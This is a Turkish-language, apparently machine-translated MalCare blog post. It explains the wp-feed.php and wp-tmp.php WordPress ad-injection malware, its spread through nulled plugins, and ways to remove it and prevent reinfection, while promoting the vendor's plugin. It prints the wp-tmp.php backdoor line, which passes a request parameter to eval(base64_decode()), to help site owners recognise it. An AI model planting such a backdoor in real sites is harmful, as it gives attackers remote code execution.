WordPress'te wp-feed.php & wp-tmp.php Kötü Amaçlı Yazılım Nasıl Düzeltilir?

Kötü amaçlı yazılım tarayıcınız, "sitenizin saldırıya uğradığı" konusunda sizi uyarıyor, ancak size iyi görünüyor mu?

Ziyaretçiler WordPress web sitenizdeki spam reklamlardan şikayet ediyor ama siz hiç görmüyor musunuz?

Sitenizin saldırıya uğraması için iyi bir şans var.

Bilgisayar korsanları , saldırılarını site sahiplerinden gizlemenin akıllıca yollarını bulurlar, böylece fark edilmeden kalırlar ve web sitesini uzun süre istismar etmeye devam edebilirler.

wp-feed.php, oradaki en zekice gizlenmiş hacklerden biridir.

Site sahiplerinden gizlenerek, ziyaretçilerinize yasa dışı ürünler, uyuşturucular ve yetişkinlere uygun içerik reklamları görüntüler.

Tespit edebilmiş olsanız bile, enfeksiyonun yayıldığı tüm yerleri bulmak sadece zor değil, bazen de imkansızdır. Enfeksiyonun çıkarılması karmaşık ve zordur. Onu kaldırmayı başarırsanız, 10 vakanın 8'inde enfeksiyon yeniden ortaya çıkar.

Alt satır: Bir wp-feed.php enfeksiyonunu bir WordPress web sitesinden kaldırmak zordur.

Neyse ki, bu kötü amaçlı yazılımla daha önce sayısız kez uğraştık. Geçtiğimiz on yılda, wp-feed'i yüzlerce ve binlerce WordPress web sitesinden başarıyla kaldırmakla kalmadık, aynı zamanda yeniden bulaşmaları da önledik.

Merak etme. emin ellerdesin.

Bu makalede şunları öğreneceksiniz:

• wp-feed.php kötü amaçlı yazılımı nasıl çalışır ve web sitenizi nasıl etkiler?
• Sitenizden nasıl kaldırılır
• Gelecekte yeniden enfeksiyon nasıl önlenir

TL; DR

wp-feed.php enfeksiyonunu ortadan kaldırmak için tek yapmanız gereken WordPress Kötü Amaçlı Yazılım Temizleme Eklentimizi kurmak ve Otomatik Temizleme işlevini çalıştırmak. Eklenti ayrıca aşağıdakileri yaparak yeniden bulaşmayı önlemeye yardımcı olur:

• Yeniden bulaşmayı sağlayan web sitesi arka kapılarını kaldırma
• Bir güvenlik duvarı ve oturum açma koruması ile kötü niyetli trafiğin sitenize erişmesini engelleme.

wp-feed.php & wp-tmp.php nedir? (Nedenler, Belirtiler ve Yeniden Enfeksiyonlar)

Özetle: WP-Feed, web sitelerinde kötü amaçlı reklamlar görüntüleyen bir tür kötü amaçlı yazılımdır. Amaç, ziyaretçilerinizin reklamları tıklamasını ve onları kötü niyetli bir web sitesine yönlendirmesini sağlamaktır.

Merak ediyor olmalısın –

> Web siteme nasıl bulaştı?

Enfeksiyona genellikle boş eklentilerin veya temaların kullanımı neden olur.

Nulled yazılım, size ücretsiz premium özellikler sundukları için caziptir. Birçoğu, geçersiz kılınan yazılımın bir hayırseverlik eylemi olarak dağıtıldığına inanıyor.

Bu genellikle durumdan uzaktır. Nulled yazılım, bilgisayar korsanlarının sitenize zahmetsizce erişebilmesi için dağıtılır.

Nulled eklentiler veya temalar kötü amaçlı yazılımlarla doludur. Web sitenize boş bir tema veya eklenti yüklediğinizde, temelde bilgisayar korsanlarının sitenize erişmesi için kapılar açmış olursunuz.

Nulled yazılımların yanı sıra, eski eklentiler ve temalar da savunmasız olabilir. Bilgisayar korsanları, sitenize girmek için bu güvenlik açıklarından yararlanır.

Ayrıca "admin" ve "[email protected]" gibi zayıf kullanıcı adlarını ve şifreleri de kullanırlar. Zayıf kimlik bilgilerinin tahmin edilmesi kolaydır.

Bir bilgisayar korsanı, kullanıcı adınızı ve giriş bilgilerinizi tahmin edebilir ve wp-feed.php kötü amaçlı yazılımını doğrudan web sitenize yerleştirebilir.

> Bilgisayar korsanları neden sitelere wp-feed.php bulaştırıyor?

Amaç, bilgisayar korsanlarının gelir elde edebilmesi için ziyaretçilerinizi çalmak ve sahte hizmetler veya ürünler satın almaya kandırmaktır.

Gerçekten şaşırtıcı olan, site sahibi tek bir ipucu almadan bunu nasıl başarabildikleridir.

Bu da bizi şu soruya getiriyor –

> Bu enfeksiyonun belirtilerini fark etmek neden zor?

Bilgisayar korsanları web sitenize eriştiklerinde, wp-includes klasörünüze iki dosya (wp-feed.php & wp-tmp.php) yerleştirirler.

wp-includes klasörü, WordPress çekirdeğinizin bir parçasıdır. Web sitenizin temasının bulunduğu yerdir.

WP besleme dosyası, diğer WordPress dosyalarına, özellikle de aktif temanızın bir parçası olan function.php'ye bulaşmaya başlar.

Bilgisayar korsanları, function.php içinden WordPress web sitenizde kötü amaçlı açılır pencere reklamları görüntüleyebilir.

Ancak asıl şeytani olan kısım, reklamların tekrar eden ziyaretçilere değil , yalnızca yeni ziyaretçilere gösterilmesidir . Kötü amaçlı yazılım, reklamların yalnızca yeni ziyaretçilere gösterilmesini sağlamak için sitenize gelen ziyaretçileri kaydeder. Bu, algılamayı önlemenin ustaca bir yoludur.

Bu nedenle, kendi sitenizi sık sık ziyaret eden biri olarak, hiçbir zaman bir hack belirtisi görmezsiniz.

wp-feed.php Kötü Amaçlı Yazılım Nasıl Temizlenir?

Enfeksiyonu ortadan kaldırmanın iki yolu vardır. Onlar –

1. Bir eklenti kullanmak (kolay)

2. Manuel olarak yapmak (zor)

Her yönteme girelim.

1. WP-Feed.php Kötü Amaçlı Yazılımını Eklentiyle Kaldırma (kolay yol)

Bazılarınızın web sitenizde zaten yüklü bir güvenlik eklentisi olabilir. Kötü niyetli dosyalar hakkında sizi uyaran muhtemelen bu eklentiydi – wp-includes/wp-feed.php ve wp-includes/wp-tmp.php .

Çoğu güvenlik eklentisi kötü amaçlı yazılım temizleme hizmetleri sunar, ancak çok azı bunu MalCare Security kadar hızlı ve etkili bir şekilde yapabilir.

• MalCare sitenizi 60 saniyenin altında temizler. Bir bilet yükseltmek zorunda değilsiniz. Kuyrukta beklemek zorunda değilsiniz. Sitenizin kimlik bilgilerini 3. taraf bir eklentiye teslim etmeniz gerekmez.

• Sadece bu da değil, eklenti gizli kötü amaçlı yazılımları arayarak her köşeye ve buğuya gider. Sitenizde bulunan her bir kötü amaçlı komut dosyasını bulur.

• Yeni ve iyi gizlenmiş kötü amaçlı yazılımları tespit etmek için geleneksel olmayan yöntemler kullanır. Kötü niyetli amacı belirlemek için kodun davranışını kapsamlı bir şekilde analiz eder. Bu aynı zamanda iyi kodun kötü olarak işaretlenmemesini sağlamaya da yardımcı olur.

• Bunların hepsini birkaç dakika içinde yapar .

MalCare ile wp-feed.php enfeksiyonunu temizleyelim.

Adım 1: WordPress web sitenize MalCare Security'yi kurun ve etkinleştirin.

Adım 2: Pano menünüzden MalCare'i seçin. E-posta adresinizi girin ve Şimdi Güvenli Site'ye tıklayın.

3. Adım: Bir sonraki sayfada bir şifre girmeniz ve ardından URL'nizi girmeniz istenecektir.

MalCare hemen web sitenizi taramaya başlayacaktır. Amaç, web sitenizde bulunan her bir kötü amaçlı kod örneğini bulmaktır.

Bu, yalnızca wp-feed.php ve wp-tmp.php dosyalarını değil, ayrıca function.php dosyasında saklanan örnekler de dahil olmak üzere WordPress dosyalarınıza bulaşan tüm kötü amaçlı kodları da algılayacağı anlamına gelir.

Eklentinin, yeniden bulaşmaları önlemek için sitenizde bulunan her bir arka kapıyı bulacağından emin olabilirsiniz.

Kötü amaçlı komut dosyalarını bulduğunda, eklenti sizi bu konuda uyaracaktır.

Ardından, sitenizi temizlemeniz gerekir.

Lütfen MalCare'in kötü amaçlı yazılımları kaldırmanın birinci sınıf bir özellik olduğunu unutmayın . Dışarısı eklentisi sadece anlık kötü amaçlı yazılımları temizleme bulunuyor. Yılda 99$'a tek bir siteyi istediğiniz kadar temizleyebilir ve sahip olabileceğiniz en iyi korumadan emin olabilirsiniz. MalCare Fiyatlandırması hakkında daha fazla bilgi edinin .

Adım 4: wp-feed.php'nin her izini web sitenizden kaldırmak için tek yapmanız gereken Otomatik Temizleme düğmesine tıklamak.

MalCare sitenizi anında temizlemeye başlayacaktır.

İşte bu millet. Bir eklenti ile web sitenizi bu şekilde temizlersiniz.

2. WP-Feed.php Kötü Amaçlı Yazılımını El İle Kaldırın (zor yol)

Enfeksiyonu manuel olarak çıkarmak oldukça zordur, çünkü bu tür bir enfeksiyonda çok sayıda hareketli parça vardır.

• Bilgisayar korsanı iki kötü amaçlı dosya yükler – wp-feed.php ve wp-tmp.php. Başlamak için bunları kaldırmanız gerekir. Bu muhtemelen tek kolay kısım.
• Enfeksiyon, function.php dosyası da dahil olmak üzere diğer WordPress dosyalarına yayılır. Bu zor, çünkü enfeksiyonun nereye yayıldığını kim söyleyebilir.
  • Tüm kötü amaçlı kodları bulmanız saatler sürer.
  • İyi gizlenmiş oldukları ve normal kod parçaları gibi göründükleri için kötü amaçlı kodu tanımak zordur.
  • “eval(base64_decode)” gibi bilinen bazı kötü amaçlı kodlar, meşru eklentilerin parçası olabilir. Kötü amaçla kullanılmazlar. Bu nedenle, kodu silmek eklentinizi etkiler ve hatta sitenizi bozabilir.
  • Yeniden bulaşmaya yol açabilecek kod parçalarını kaçırmanız için oldukça iyi bir şans var.

El ile kaldırma, bu nedenle, hiç etkili değildir.

Ancak, yine de yapmak istiyorsanız, lütfen web sitenizin tam bir yedeğini alın. Yanlışlıkla bir şeyi silip sitenizi bozarsanız, hızlı bir şekilde normale döndürebilirsiniz.

İşte seçebileceğiniz en iyi yedekleme hizmetlerinin bir listesi.

Ve işte kötü amaçlı yazılımı manuel olarak kaldırmanıza yardımcı olacak bir makale – WordPress hacklendi. “Saldırıya Uğramış Bir WordPress Web Sitesini Manuel Olarak Nasıl Temizlersiniz” bölümüne atlamanız yeterlidir .

Web siteniz artık virüssüz, ancak güvenli olmaktan çok uzak. Bilgisayar korsanları yine de sitenizi hedefleyebilir ve sitenize virüs bulaştırmaya çalışabilir. Sitenizin gelecekteki enfeksiyonlardan korunduğundan emin olmanız gerekir. Ama buna girmeden önce, wp-feed.php & wp-tmp.php enfeksiyonunun etkisine bir göz atalım.

wp-temp.php Kötü Amaçlı Yazılım Enfeksiyonunun Etkisi

wp-feed.php ve wp-tmp.php kötü amaçlı yazılımlarının varlığının web siteniz üzerinde yıkıcı bir etkisi olabileceğini söylemeye gerek yok.

wp-temp.php bulaşmış web siteleri genellikle aşağıdaki sonuçlara maruz kalır:

• Hemen çıkma oranında bir artış ve ziyaretçilerin web sitenizde harcadıkları sürenin azaldığını fark edeceksiniz.

• Pop-up reklamlar web sitenizi ağırlaştırır ve gerçekten yavaşlatır .

• Yavaş bir web sitesini kimse sevmez, bu nedenle ziyaretçilerin sayfalarınız tarayıcıya yüklenmeden önce geri düğmesine basması muhtemeldir. Bunun domino etkisi olacaktır.

• Arama motorları, insanların sitenizden ne kadar hızlı ayrıldığını fark edecek. Kullanıcıların aradıklarını sunmadığınız sonucuna varacaklar. Arama motoru sıralamanız düşecek .

• Bu, SERP'lerde daha üst sıralarda yer almak için harcadığınız tüm çaba, zaman ve paranın boşa gittiği anlamına gelir .

• Saldırıya uğramış web siteleri Google tarafından kara listeye alınır ve barındırma sağlayıcıları tarafından askıya alınır . Ayrıca, saldırıya uğrayan siteler google reklamları yayınlıyorsa, adwords hesabı askıya alınır. Bütün bunlar trafiğe daha fazla dalmaya yol açacaktır.

• Ayrıca, doğru araçları kullanmıyorsanız, saldırıya uğramış web sitelerinin temizlenmesi gerekir ve bu pahalı bir iş olabilir.

İyi haber şu ki, sitenizin saldırıya uğradığını biliyorsunuz. Bu nedenle temizleyebilir ve etkiyi durdurabilirsiniz.

Gelecekte Sitenizi wp-feed.php Kötü Amaçlı Yazılımlardan Nasıl Korursunuz?

Okurlarımızın çoğu, wp-feed.php kötü amaçlı yazılımını sitelerinden kaldırmayı denemiş olabilir, ancak yalnızca kötü amaçlı yazılımın geri dönmeye devam ettiğini keşfeder.

Bunun nedeni, sitenizde yüklü bir arka kapı bulunmasıdır. Çoğu arka kapı son derece iyi gizlenmiştir, öyle ki amatör geliştiriciler tarafından meşru kod olarak geçirilebilirler.

Bir önceki bölümde, bilgisayar korsanlarının web sitenizin koduna wp-feed.php ve wp-tmp.php adlı iki dosya eklediğini açıklamıştık. wp-tmp.php dosyası bir arka kapı görevi görür. Dosyayı açarsanız, şuna benzeyen bir komut dosyası bulacaksınız –

 $p = $REQUEST$#91;”m”]; eval(base64_decode ($p));

İyi haber şu ki, aşağıdaki önlemleri alarak sitenizi gelecekteki saldırı girişimlerinden koruyabilirsiniz:

1. Nulled Yazılımı Sil ve Bunları Kullanmayı Durdur

Web sitenizde boş bir eklenti veya tema kullanıyorsanız hemen silin .

Bilgisayar korsanları, ilk etapta boş yazılım kullanarak sitenize erişim sağladı. Sitenizi ne kadar iyi temizlerseniz temizleyin, geçersiz kılınmış yazılımı kaldırmazsanız, bilgisayar korsanları sitenize girecek ve kötü amaçlı yazılım yerleştirecektir.

Kullanıcılarınıza eklenti ve tema yükleme izni verdiyseniz, hiçbir zaman boş yazılım kullanmadıklarından emin olun.

Aslında, MalCare'in yardımıyla eklentilerin ve temaların tamamen yüklenmesini önlemek için pratik yapmak daha iyidir.

Tek yapmanız gereken MalCare'in kontrol paneline giriş yapmak, web sitenizi seçmek, Sertleştirme Uygula'ya tıklamak ve Blok Eklenti/Tema Kurulumunu etkinleştirmek.

2. Site Güvenliğinizi Güçlendirin

Dosya izinlerini değiştirerek bilgisayar korsanlarının wp-feed.php gibi kötü amaçlı dosyaları WordPress klasörlerinize yerleştirmesini önleyebilirsiniz.

Dosya izinleri, kimin hangi dosyalara erişebileceğini belirleyen bir dizi kuraldır. Kullanıcıların wp-includes klasöründe değişiklik yapmasını engelleyebilirsiniz. Dosya izinlerini daha derinlemesine anlamak için şu kılavuza göz atın: WordPress Dosya İzinleri.

Ayrıca dosya düzenleyiciyi devre dışı bırakarak bilgisayar korsanlarının temanızı değiştirmesini engelleyebilirsiniz . Bu, web sitenize pop-up reklamlar eklemelerini önleyecektir. Manuel olarak yapabilirsiniz ancak risklidir ve önerilmez.

Sitenizde MalCare zaten yüklüyse, dosya düzenleyiciyi devre dışı bırakmak için tek yapmanız gereken bir düğmeyi tıklamaktır.

WordPress sertleştirme hakkında daha fazla bilgi edinin.

3. Web Sitenizi Güncel Tutun

Diğer tüm yazılımlar gibi, WordPress eklentileri ve temaları da güvenlik açıkları geliştirir. Geliştiriciler bu güvenlik açığını öğrendiğinde, hızlı bir şekilde bir yama oluşturur ve bunu bir güncelleme şeklinde yayınlar.

Güncellemelerin uygulanmasında herhangi bir gecikme olursa sitenizi riske atar.

Bilgisayar korsanları, güvenlik açıklarından yararlanma konusunda iyidir . Aslında, siteye erişmek ve siteye kötü amaçlı yazılım bulaştırmak için kullanabilmeleri için güvenlik açıkları olan web sitelerini her zaman ararlar.

Bu nedenle, güncellemeleri asla geciktirmeyin.

Güvenlik güncellemeleri hakkında buradan daha fazla bilgi edinebilirsiniz – WordPress Güvenlik Güncellemeleri.

İşte sitenizi güncel tutmanıza yardımcı olacak bir kılavuz – WordPress Nasıl Güncellenir.

4. Güçlü Kimlik Bilgilerinin Kullanımını Zorunlu Kılın

Web sitenize erişmenin en kolay yolu, giriş sayfanızdır.

Bilgisayar korsanının yalnızca kullanıcı kimlik bilgilerinizi başarıyla tahmin etmesi gerekir. Aslında, birkaç dakika içinde yüzlerce kullanıcı adı ve şifre kombinasyonunu deneyebilecek botlar tasarlarlar. Siz veya takım arkadaşlarınızdan herhangi biri "admin" ve "password123" gibi tahmin edilmesi kolay kimlik bilgileri kullanıyorsanız, botların sitenizi ihlal etmesi 2 saniye sürer. Buna kaba kuvvet saldırısı denir.

Web sitenizin her kullanıcısının benzersiz kullanıcı adları ve güçlü şifreler kullanmasını sağlamak önemlidir.

Hatta bunun ötesine geçebilir ve giriş sayfanızı korumak için çeşitli önlemler uygulayabilirsiniz. Alabileceğiniz WordPress giriş güvenlik önlemlerinin bir listesini derledik.

5. Bir Güvenlik Duvarı Kullanın

İlk etapta bilgisayar korsanlarının web sitenize girmesini bile engelleyebilseydiniz harika olmaz mıydı?

Güvenlik duvarı tam da ihtiyacınız olan araçtır.

Sitenize erişmek isteyen trafiği araştırır . Güvenlik duvarı trafiğin kötü niyetli bir IP adresinden geldiğini tespit ederse, trafiği anında engeller.

Bu şekilde, bilgisayar korsanlarını ve botları filtreler.

İşte sitenizde etkinleştirebileceğiniz en iyi WordPress güvenlik duvarlarının bir listesi.

Ancak, MalCare kullanıyorsanız, sitenizde zaten bir güvenlik duvarı etkinleştirilmiş demektir.

Sırada ne var?

Sitenizi nasıl temizleyeceğinizi ve bir daha asla saldırıya uğramamanızı nasıl sağlayacağınızı gösterdik.

Web sitenizi bir dizi felaketten kurtaracağını düşündüğümüz bir tavsiye: Web sitenizin düzenli olarak yedeklerini alın.

Web siteniz ister aniden hata veriyor olsun, isterse bozuk olsun, bir yedekleme sitenizi geçici olarak hızlı bir şekilde düzeltmenize yardımcı olacaktır.

MalCare Security'ye abone olursanız, ek bir ücret karşılığında bir yedek eklentiden de yararlanabilirsiniz. Daha fazlasını öğrenmek için bizimle iletişime geçin.

MalCare Güvenlik Eklentisine bir şans verin !